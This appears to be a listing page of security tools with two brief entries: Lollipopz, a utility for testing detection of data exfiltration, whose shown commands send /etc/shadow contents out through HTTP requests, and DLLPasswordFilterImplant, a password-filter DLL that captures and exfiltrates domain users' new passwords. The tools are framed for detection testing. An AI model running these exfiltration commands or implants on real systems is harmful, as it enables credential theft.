Lollipopz – Data Exfiltration Utility For Testing Detection Capabilities

Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.Exfiltration How-To /etc/shadow -> HTTP GET requests Server # ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log Client $ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r /etc/shadow -> HTTP POST requests Server # ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTServer -lp 80Read More

DLLPasswordFilterImplant – DLL Password Filter Implant With Exfiltration Capabilities

DLLPasswordFilterImplant is a custom password filter DLL that allows the capture of a user’s credentials. Each password change event on a domain will trigger the registered DLL in order to exfiltrate the username and new password value prior successfully changing it in the Active Directory (AD).For more information about password filters consult Microsoft’s documentation.Installing ToRead More

X